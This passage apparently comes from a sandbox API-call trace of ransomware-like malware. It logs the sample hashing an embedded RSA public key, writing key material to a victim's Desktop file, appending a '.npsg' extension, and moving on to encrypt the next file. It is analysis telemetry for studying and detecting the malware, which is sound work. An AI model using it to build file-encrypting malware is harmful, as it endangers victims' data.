KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.013] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.013] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.013] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a440) returned 1 [0236.015] CryptCreateHash (in: hProv=0x67a440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.015] CryptHashData (hHash=0x33f0408, pbData=0x6962b0, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.015] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.015] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.015] GetLastError () returned 0x0 [0236.015] SetLastError (dwErrCode=0x0) [0236.015] GetLastError () returned 0x0 [0236.015] SetLastError (dwErrCode=0x0) [0236.015] GetLastError () returned 0x0 [0236.015] SetLastError (dwErrCode=0x0) [0236.015] GetLastError () returned 0x0 [0236.015] SetLastError (dwErrCode=0x0) [0236.015] GetLastError () returned 0x0 [0236.015] SetLastError (dwErrCode=0x0) [0236.015] GetLastError () returned 0x0 [0236.015] SetLastError (dwErrCode=0x0) [0236.015] GetLastError () returned 0x0 [0236.015] SetLastError (dwErrCode=0x0) [0236.015] GetLastError () returned 0x0 [0236.015] SetLastError (dwErrCode=0x0) [0236.015] GetLastError () returned 0x0 [0236.015] SetLastError (dwErrCode=0x0) [0236.015] GetLastError () returned 0x0 [0236.016] SetLastError (dwErrCode=0x0) [0236.016] GetLastError () returned 0x0 [0236.016] SetLastError (dwErrCode=0x0) [0236.016] GetLastError () returned 0x0 [0236.016] SetLastError (dwErrCode=0x0) [0236.016] GetLastError () returned 0x0 [0236.016] SetLastError (dwErrCode=0x0) [0236.016] GetLastError () returned 0x0 [0236.016] SetLastError (dwErrCode=0x0) [0236.016] GetLastError () returned 0x0 [0236.016] SetLastError (dwErrCode=0x0) [0236.016] GetLastError () returned 0x0 [0236.016] SetLastError (dwErrCode=0x0) [0236.016] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.016] CryptReleaseContext (hProv=0x67a440, dwFlags=0x0) returned 1 [0236.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6962b0 | out: hHeap=0x620000) returned 1 [0236.016] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.016] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.016] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.016] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x64dd08, Size=0x218) returned 0x346fd28 [0236.017] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x554, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.017] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cb70 [0236.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b7a060 [0236.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b7a060, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0236.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b947f8 [0236.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cb70 | out: hHeap=0x620000) returned 1 [0236.018] WriteFile (in: hFile=0x644, lpBuffer=0x3b947f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b947f8*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0236.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.018] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.018] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.018] CloseHandle (hObject=0x644) returned 1 [0236.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0236.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x3b95d50 [0236.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0236.020] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-G-HIJj-GN6to.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-g-hijj-gn6to.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-G-HIJj-GN6to.avi.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-g-hijj-gn6to.avi.npsg")) returned 1 [0236.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0236.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.021] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x68a920 | out: hHeap=0x620000) returned 1 [0236.022] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9e35790, ftCreationTime.dwHighDateTime=0x1d5b831, ftLastAccessTime.dwLowDateTime=0xa06d4650, ftLastAccessTime.dwHighDateTime=0x1d5b853, ftLastWriteTime.dwLowDateTime=0xa06d4650, ftLastWriteTime.dwHighDateTime=0x1d5b853, nFileSizeHigh=0x0, nFileSizeLow=0xb62b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2 L11W.gif", cAlternateFileName="2L11W~1.GIF")) returned 1 [0236.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0236.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x68a920 [0236.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.022] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2 L11W.gif") returned=".gif" [0236.022] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2 L11W.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2 l11w.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.023] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=46635) returned 1 [0236.023] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.026] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xb605, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.026] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.027] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.027] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xb62b, lpOverlapped=0x0) returned 1 [0236.027] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.027] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.027] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.027] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a440) returned 1 [0236.029] CryptCreateHash (in: hProv=0x67a440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.029] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.029] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.029] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.029] GetLastError () returned 0x0 [0236.029] SetLastError (dwErrCode=0x0) [0236.029] GetLastError () returned 0x0 [0236.029] SetLastError (dwErrCode=0x0) [0236.029] GetLastError () returned 0x0 [0236.029] SetLastError (dwErrCode=0x0) [0236.029] GetLastError () returned 0x0 [0236.029] SetLastError (dwErrCode=0x0) [0236.029] GetLastError () returned 0x0 [0236.029] SetLastError (dwErrCode=0x0) [0236.029] GetLastError () returned 0x0 [0236.029] SetLastError (dwErrCode=0x0) [0236.029] GetLastError () returned 0x0 [0236.029] SetLastError (dwErrCode=0x0) [0236.029] GetLastError () returned 0x0 [0236.029] SetLastError (dwErrCode=0x0) [0236.029] GetLastError () returned 0x0 [0236.029] SetLastError (dwErrCode=0x0) [0236.029] GetLastError () returned 0x0 [0236.030] SetLastError (dwErrCode=0x0) [0236.030] GetLastError () returned 0x0 [0236.030] SetLastError (dwErrCode=0x0) [0236.030] GetLastError () returned 0x0 [0236.030] SetLastError (dwErrCode=0x0) [0236.030] GetLastError () returned 0x0 [0236.030] SetLastError (dwErrCode=0x0) [0236.030] GetLastError () returned 0x0 [0236.030] SetLastError (dwErrCode=0x0) [0236.030] GetLastError () returned 0x0 [0236.030] SetLastError (dwErrCode=0x0) [0236.030] GetLastError () returned 0x0 [0236.030] SetLastError (dwErrCode=0x0) [0236.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.030] GetLastError () returned 0x0 [0236.030] SetLastError (dwErrCode=0x0) [0236.030] GetLastError () returned 0x0 [0236.030] SetLastError (dwErrCode=0x0) [0236.030] GetLastError () returned 0x0 [0236.030] SetLastError (dwErrCode=0x0) [0236.030] GetLastError () returned 0x0 [0236.030] SetLastError (dwErrCode=0x0) [0236.030] GetLastError () returned 0x0 [0236.031] SetLastError (dwErrCode=0x0) [0236.031] GetLastError () returned 0x0 [0236.031] SetLastError (dwErrCode=0x0) [0236.031] GetLastError () returned 0x0 [0236.031] SetLastError (dwErrCode=0x0) [0236.031] GetLastError () returned 0x0 [0236.031] SetLastError (dwErrCode=0x0) [0236.031] GetLastError () returned 0x0 [0236.031] SetLastError (dwErrCode=0x0) [0236.031] GetLastError () returned 0x0 [0236.031] SetLastError (dwErrCode=0x0) [0236.031] GetLastError () returned 0x0 [0236.031] SetLastError (dwErrCode=0x0) [0236.031] GetLastError () returned 0x0 [0236.031] SetLastError (dwErrCode=0x0) [0236.031] GetLastError () returned 0x0 [0236.031] SetLastError (dwErrCode=0x0) [0236.031] GetLastError () returned 0x0 [0236.031] SetLastError (dwErrCode=0x0) [0236.031] GetLastError () returned 0x0 [0236.031] SetLastError (dwErrCode=0x0) [0236.031] GetLastError () returned 0x0 [0236.031] SetLastError (dwErrCode=0x0) [0236.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0236.032] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.032] CryptReleaseContext (hProv=0x67a440, dwFlags=0x0) returned 1 [0236.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.032] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.032] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.032] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb630) returned 0x3b7fcd0 [0236.032] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0236.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0236.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0236.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b94d68 [0236.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fffc0 [0236.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b94db0 [0236.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff18 [0236.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff60 [0236.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400008 [0236.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff78 [0236.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0236.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x64dd08 [0236.033] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x64dd08, Size=0x218) returned 0x346fd28 [0236.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8b308 [0236.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff60 | out: hHeap=0x620000) returned 1 [0236.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff78 | out: hHeap=0x620000) returned 1 [0236.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400008 | out: hHeap=0x620000) returned 1 [0236.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8b308 | out: hHeap=0x620000) returned 1 [0236.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400008 [0236.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0236.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fff78 [0236.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x33fff60 [0236.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0236.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0236.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0236.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff78 | out: hHeap=0x620000) returned 1 [0236.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff60 | out: hHeap=0x620000) returned 1 [0236.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400008 | out: hHeap=0x620000) returned 1 [0236.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0236.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.034] GetCurrentThreadId () returned 0x5b4 [0236.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x687f70 [0236.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a440 [0236.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.035] GetCurrentThreadId () returned 0x5b4 [0236.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0236.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400008 [0236.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.036] RtlAllocateHeap 